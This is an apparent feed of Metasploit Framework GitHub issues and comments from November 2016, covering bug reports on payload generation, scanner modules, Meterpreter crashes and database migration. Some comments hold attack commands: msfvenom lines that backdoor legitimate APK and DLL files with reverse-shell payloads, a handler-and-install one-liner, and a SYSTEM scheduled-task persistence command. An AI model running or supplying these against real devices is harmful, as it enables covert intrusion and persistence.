I don't know if no answer for time or if i can't ask it but can you answer just with  "No you can't" or " Yes can " afther if you can explain me how to do i m more happy. Thanks .

[2016-11-15 18:46] ViRb3 opened #7563 "Screenshot and migration don't work on Windows XP"
## Steps to reproduce
Invoke either of the two commands.

## Expected behavior
Work like they should.

## Current behavior
Screenshot times out while migration crashes the host process (e.g. explorer.exe).

## System stuff
### Metasploit version
Framework: 4.12.32-dev
Console : 4.12.32-dev

### I installed Metasploit with:
Pre-installed on Kali Linux

### OS
Kali Linux 2016.2 Rolling
and Windows X

[2016-11-15 18:46] ViRb3 commented on #7496
Any updates on this issue? Is it related with #7563

[2016-11-15 19:12] busterb commented on #7496
Honestly, it worked fine for me so far. Anything you can say more than just 'Windows XP SP3' ?

[2016-11-15 19:43] ViRb3 commented on #7496
@busterb Well, it's an activated Windows XP SP3 with the latest updates available running under a VMWare Workstation 12 Pro on a host Windows 10 machine. I really doubt the virtualization being the issue but I may be wrong.

[2016-11-15 19:44] busterb commented on #7496
OK, updating a VM to check it out.

[2016-11-15 20:00] busterb opened #7564 "Out of box 'Metasploit' Icon in Latest Kali Linux Rolling 2016.2 fails database migrate backtrace"
## Steps to reproduce

How'd you do it?

Be sure the Kali Linux database is disabled by first running 'msfdb delete' from a command prompt. Then click the Metasploit Framework icon:

[code]

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [X] Kali package via apt
- [ ] Omnibus ins

[2016-11-15 20:03] bcook-r7 commented on #7564
Hi Lance, this was the issue I mentioned earlier. It doesn't always fail the same way. Sometimes it dies on 'email_templates', or something else. Note, the Kali linux 'msfdb' script does run 'rake db:migrate' I believe before spawning msfconsole.

PostgreSQL version 9.6.0, though I'll admit I haven't used the Kali Metasploit icon much in the past, so I would not be sure if 9.5.x had the same behav

[2016-11-15 20:13] bcook-r7 commented on #7564
Never mind, I found the issue on the Kali linux end:

https://bugs.kali.org/view.php?id=3725

[2016-11-15 20:13] #7564 closed

[2016-11-15 20:39] pbarry-r7 commented on #7564
Nice catch, BusterB!

[2016-11-15 20:53] exploitagency commented on #7524
I don't know, fails every time for me when using those characters... just tried in a new Kali VM(fully updated though).  I was just throwing it out there, .  The tools works great for me otherwise.

root@kali:/opt/metasploit-framework# ./msfvenom -x "s(1).apk" -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o out.apk
Using APK template: s(1).apk
No platform was selected, choosing Ms

[2016-11-15 22:33] #7525 closed

[2016-11-16 06:27] busterb commented on #7496
I still was unable to reproduce the problem with a fully-patched Windows XP SP3 VM.

Could you do a packet capture and let us know what you're seeing on the wire. Maybe share a pcap?

[2016-11-16 13:05] bwatters-r7 commented on #7563
I cannot reproduce this on the current master branch.
commit 7e4645afb396fabc089a0235d09cc719c435d115

[code]
![mgjayeih](https://cloud.githubusercontent.com/assets/17987018/20348443/148ef13e-abcb-11e6-884e-076dd6230293.jpeg)

[2016-11-16 13:48] bwatters-r7 commented on #7496
I happen to have a Win XP SP3 VM running in VMWare 12 on a Windows 10 Pro physical host running from another test, so I gave this a test.  Please let me know if this is different than your scenario, @ViRb3:

Using Master Branch of Github, commit 7e4645afb396fabc089a0235d09cc719c435d115
## msfconsole running on
[code]
## Create Payload:
[code]
## Get Callback
[code]

[2016-11-16 16:14] bwatters-r7 commented on #7545
Is there any chance a proxy connection was involved?

[2016-11-16 17:13] arisada commented on #7545
No, I reproduced it with a direct connection, so no proxy

[2016-11-16 19:05] #7514 closed

[2016-11-16 19:30] Bry-fi opened #7568 "operation failed 3221226021"
## Steps to reproduce

How'd you do it?

1. Gain a x64 shell on windows 10 or 8.1
2. Load the kiwi module
3. Run any command from the module (creds_all, creds_wdigest)
4. (NOTE: I have disabled the UseLogonCredential or set it to 1 and tried setting it to 0 in regedit using the wdigest caching and I still get the same result.)
This section should also tell us any relevant information about the
env

[2016-11-16 19:32] Bry-fi commented on #7552
I can agree on the crashing of backdoor'd apk files. Any reason on why this is occuring?

[2016-11-16 20:03] VanishingTacos commented on #7552
@Bry-fi It must be some sort of security feature built into some variants of android. The payload works on some devices.

[2016-11-16 20:16] dana-at-cp commented on #7552
@VanishingTacos Have you tried the APK from the Gooogle Play store? I'd be curious to see if there is a difference.

Another thing to consider is that some APKs target particular architectures (e.g. ARM or x86). If you grabbed an APK for ARM, injected a Meterpreter payload, and then installed the new APK on an x86 device then you can expect crashes and other odd app behavior.

[2016-11-16 20:19] VanishingTacos commented on #7552
@dana-at-cp I will be sure to look into that in a bit. I have to run out now for a few errands. I will get back as soon as I can.

[2016-11-16 21:05] jaws1932 opened #7569 "Warbird check on Win2K3 dll"
## Steps to reproduce
Windows 2003 Server

I was trying to use wab32res.dll from Outlook as the template to create a payload in which the outlook address book would still load, however, I hit the warbird check.

msfvenom -p windows/shell/reverse_tcp -x /root/Desktop/wab32res.dll -f dll -k -o /var/www/html/reverse4.dll LHOST=192.168.100.13 LPORT=8888 EXITFUNC=thread
No platform was selected, choosi

[2016-11-17 05:20] void-in commented on #7569
The warbird was creating problems in injection on Windows 7 and later that is why the check was introduced in https://github.com/rapid7/metasploit-framework/pull/5660. It is better to use a template that is not protected by warbird since at the time of generating the payload it is not possible to determine where it is going to run.

[2016-11-17 10:23] d3fiantc0der commented on #7558
bump

[2016-11-17 11:52] timwr opened #7571 "Request: Add some unit tests for Msf::Payload::Apk"
It was mentioned in https://github.com/rapid7/metasploit-framework/pull/7567 that we don't currently have any tests for Android, specifically lib/msf/core/payload/apk.rb
I'm raising this issue for visibility.
Perhaps we could have some tests that assume that a device is connected with adb, that are skipped if the device is not present?
In theory we could download the android sdk, fire up an emulat

[2016-11-17 16:06] itsbriany commented on #7571
@timwr Thanks for accepting #7567!

I was thinking something more amongst the lines of unit testing (i.e. testing individual functions for generating Android APKs) such that we can expect a properly formatted payload APK.

For example, while debugging https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/apk.rb#L69, I was loading up `msfvenom` every time to test my change

[2016-11-17 16:08] jinq102030 opened #7575 "auxiliary/scanner/ftp/titanftp_xcrc_traversal module will hang"
## Steps to reproduce

set up a titan ftp server (or emulator)
1. use auxiliary/scanner/ftp/titanftp_xcrc_traversal
2. set RHOSTS 127.0.0.1
3. type the command "run"
4. observe that after all the network activity, the module hang.

[2016-11-17 20:02] bwatters-r7 commented on #7545
Well, crap.  So I tried this about a dozen times on my 2012 DC and once, I got the 99% CPU hit.  Unfortunately, I could not duplicate it after that one time, even using the same settings.

So on the bright side, I can confirm behavior, but I cannot re-create it at-will so troubleshooting is going to be very hard.  Were you able to get the spike consistently?

![image](https://cloud.githubuserconte

[2016-11-17 20:16] #7575 closed

[2016-11-17 20:23] arisada commented on #7545
I think you will get it on 2008r2 more consistently. I used the same techniques during the pentest of a 2012-based infrastructure and never got any complaint of that kind, so maybe it matters. I have a 2012 vm around, I will try to reproduce there.

[2016-11-17 20:37] wchen-r7 commented on #7528
Resolved in https://github.com/rapid7/metasploit-framework/pull/7549

[2016-11-17 20:37] #7528 closed

[2016-11-17 21:26] wchen-r7 commented on #7492
After some testing, it doesn't look like the feature is ideal for the exploit, therefore it will not be added.

[2016-11-17 21:26] #7492 closed

[2016-11-17 21:55] wchen-r7 commented on #7455
It might have been when the module was being written, there was something wrong with the normalization so it was always returning 0. I'm guessing at some point, that problem was addressed, but we forgot to change the behavior of the module.

[2016-11-17 22:36] bwatters-r7 commented on #7545
Hmmm.  Went ahead and made a test 2K8r2 DC.  I tried to duplicate the cpu spike, but I could not make it work.  I did notice though, that the powershell processes do not exit, and that _is_ consistent.  That may be an easier thing to fix than the cpu spike.  It looks as though that process "zombie" state is not present on my 2012 DC.  This may be something that @OJ would like to hear about, as he

[2016-11-18 06:17] timwr commented on #7571
@itsbriany that would be awesome. Unit tests would be ideal and run much more quickly and without an emulator. Many thanks for your help with this!

[2016-11-18 17:56] wchen-r7 commented on #7569
Hmmm ok, I will take a look. Thanks!

[2016-11-18 18:04] wchen-r7 commented on #7569
It looks like I can reproduce the problem. Looking into it...

[2016-11-18 20:49] #7455 closed

[2016-11-19 03:00] h00die commented on #7558
just wanted to make sure its understood, these aren't necessarily easy to do.  Some of them need pretty heavy conversion to fit standards and the the updates since they were produced.  Also, lots of hardware based ones which at least I don't have the hardware to test against.
With that being said, i'm hoping to have varnish done tonight

[2016-11-19 07:07] timwr commented on #6869
Perhaps @Manouchehri can shed some light on the android issue?

[2016-11-19 16:05] andybrucenet opened #7580 "search with multiple keywords"
## Steps to reproduce

How'd you do it?

1. with database connected, use
`search type:auxiliary name:mysql`
2. You get all results for 'auxiliary' (first keyword)

Workaround is to disconnect the database and use a slow search. Example:
[code]

Again, the problem is that with the database connected, I receive all matches from the first search keyword. This happens even after I rebuild the database

[2016-11-19 20:27] Manouchehri commented on #6869
I requested a CVE and received no response.

http://www.openwall.com/lists/oss-security/2016/10/05/16

[2016-11-21 00:46] cacaocaca opened #7581 "AutoRunScript work so with shell ?"
## Steps to reproduce

I m testing my payload create with msfvenom on my virtual machine with windows 7 32 bit it work have session so i testing so persistence but with command on shell and it work good but the problem is that i want do all automatic so i have use autorunscript so on exploit/multi/handler i set the patch
set AutoRunScript multi_console_command -rc /root/Scrivania/co.rb
The contene

[2016-11-21 02:19] ch1kpee commented on #7297
I'm having the exact same issue (trying to portfwd to an internal-only website, Linux meterpreter dies every time).

[2016-11-21 02:32] leebaird opened #7582 "Stack trace: colorado_ftp_traversal"
## Steps to reproduce
setg RHOSTS file:test2/21.txt
setg THREADS 255
setg RPORT 21
use auxiliary/scanner/ftp/colorado_ftp_traversal
run

## Expected behavior
Show scan results.

## Current behavior
[code]
### Metasploit version
v4.12.42-dev

### I installed Metasploit with:
Kali rolling

### OS
Kali rolling

[2016-11-21 02:41] h00die commented on #7582
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb#L75

[2016-11-21 02:58] h00die commented on #7582
to make sure i reporduce, i assume 10.0.1.6:21 is not running colorado, and were a valid/invalid un/pass provided?

[2016-11-21 03:19] leebaird commented on #7582
Correct on both.

[2016-11-21 04:50] timwr commented on #7581
The `shell` command is interactive. You can use the `execute` command to run a single command

[2016-11-21 05:08] leebaird opened #7583 "Stack trace: use auxiliary/scanner/smb/smb_uninit_cred"
setg RHOSTS file:/root/test2/445.txt
setg THREADS 255
setg RPORT 445
use auxiliary/scanner/smb/smb_uninit_cred
run

## Expected behavior
Results

## Current behavior
[code]
### Metasploit version
v4.12.42-dev

### I installed Metasploit with:
Kali Linux rolling

### OS
Kali Linux rolling

Testing against Metasploitable2

[2016-11-21 07:07] timwr commented on #7552
Sorry for the delay guys. This was silly of me. Basically we added proguarding of the Payload classes, which means proguard created a com.metasploit.stage.a class.
Since ES file explorer is also using proguard, it was expecting its own .a class, which we overwrote hence:
`java.lang.NoSuchFieldError: No static field c of type Ljava/lang/String; in class Lcom/estrongs/android/pop/a; or its superclas

[2016-11-21 15:57] jinq102030 opened #7585 "Got error when running module "auxiliary/scanner/http/brute_dirs""
## Steps to reproduce

How'd you do it?
[code]

## Expected behavior

It should not give exception.

## Current behavior

Got exception.

## System stuff

### Metasploit version

Framework: 4.12.22-dev-c03f35e
Console  : 4.12.22-dev-c03f35e

### I installed Metasploit with:

### OS

Ubuntu 14.04

[2016-11-21 16:59] prateepb opened #7587 "Incorrect disclosure date for modules/exploits/linux/misc/opennms_java_serialize.rb"
The disclosure date for modules/exploits/linux/misc/opennms_java_serialize.rb is incorrect. It is listed as Nov 19 2014 and should be post Nov 06 2015 based on the [original source](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)

(I was searching for exploits by date when I noticed this)

[2016-11-21 17:05] jinq102030 opened #7589 "Both "RHOST" and "RHOSTS" showed up as required option for module auxiliary/scanner/http/buffalo_login"
## Steps to reproduce

[code]

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

Only one of them should be required

[2016-11-21 19:14] cacaocaca commented on #7581
Do you mean add so it on file rb for autorunscript
execute -H -f cmd.exe -a '/c schtasks /create /sc minute /mo 1 /tn "AnnoyingCalc" /ru "NT AUTHORITY\SYSTEM" /tr C:\Windows\system\system01.exe
Answer if i have text right .. Another information becouse i have fix already with another method with reg setval and reg queryval but the problem now is that for example when have session meterpreter and h

[2016-11-21 19:45] VanishingTacos commented on #7552
@timwr I followed your instructions word for word and I still get the app to crash on start like before.

[2016-11-21 19:56] wvu-r7 commented on #7585
Are you sure you didn't add a stray ```'```?

[2016-11-21 20:00] #7589 closed

[2016-11-21 20:02] #7587 closed

[2016-11-21 20:04] wvu-r7 commented on #7585
Oof, misread the improperly formatted log. Couldn't repro either...

[2016-11-21 20:37] wchen-r7 commented on #7569
I think I know what's wrong. The check is always expecting a text section in the user-supplied file, and if there isn't one, it actually returns true (as in it thinks it's a warbird file). It needs to check nil.

[2016-11-21 20:48] #7585 closed

[2016-11-21 21:06] wchen-r7 commented on #7583
@leebaird What was the target setup when you ran this module?

[2016-11-21 21:57] wchen-r7 commented on #7463
@dmohanty-r7 Do you mind testing this patch? https://github.com/rapid7/metasploit-framework/pull/7592

The way I see it, the problem is really because the module isn't using ```redis_command``` correctly. I also fixed other things that could potential break the sam way.

[2016-11-21 22:52] bcook-r7 commented on #7552
@VanishingTacos are you already using the patch in #7552?

[2016-11-21 22:57] VanishingTacos commented on #7552
Yup I used this `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"
msfvenom -x es-file-explorer-4-1-4-3.apk -p android/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -o met.apk && adb reverse tcp:4444 tcp:4444 && adb install met.apk`

[2016-11-21 23:36] jinq102030 opened #7593 "stack trace when running module auxiliary/scanner/http/blind_sql_query"
## Steps to reproduce

[code]
## Expected behavior
Don't expect a stack trace when running this module

### Metasploit version
msf auxiliary(blind_sql_query) > version
Framework: 4.13.0-dev-90d360a
Console  : 4.13.0-dev-90d360a

### OS

Ubuntu 14.04.05

[2016-11-22 00:14] bcook-r7 commented on #7593
Fixed with #7594

[2016-11-22 00:14] #7593 closed

[2016-11-22 03:30] wvu-r7 commented on #7073
Fixed in https://github.com/rapid7/metasploit-payloads/pull/145. Thanks, @zeroSteiner. I didn't even have to do anything!

[2016-11-22 03:30] #7073 closed

[2016-11-22 03:31] h00die commented on #7582
Believe I have a fix, got 2 agrees from IRC tonight.  Since this module was largely a copy/paste job, I'll check some of the other ftp dir traverses and fix them up as well. expect a fix in the next day or three.

[2016-11-22 03:35] wvu-r7 commented on #7582
Can I disagree just to be different?

[2016-11-22 04:11] bcook-r7 commented on #7050
I don't think this is an issue any more - we brought back the 404 error a few months ago, and #7527 added LURI support for reverse_https stagers

[2016-11-22 04:11] #7050 closed

[2016-11-22 04:13] bcook-r7 commented on #7101
I believe we fixed this with https://github.com/rapid7/rex-socket/pull/1 . There could be even better fixes by handling the accept processing in a thread or not blocking in the first place. If anyone can reproduce with the latest release, would love to hear about it.

[2016-11-22 04:13] #7101 closed

[2016-11-22 04:54] valerianrossigneux commented on #7101
Hi, I'm on Kali Linux, how do I get this update ? Can I get it through apt-get ?

[2016-11-22 05:00] busterb commented on #7101
We haven't tagged 4.13.1 yet, which is the next release that will have this fix.

You'd need to be running the git version or nightly builds.

[2016-11-22 05:07] valerianrossigneux commented on #7101
thanks, what is the ETA for that ?

[2016-11-22 05:10] busterb commented on #7101
Every Friday at noon CST. Are you able to hit the issue reliably in your environment?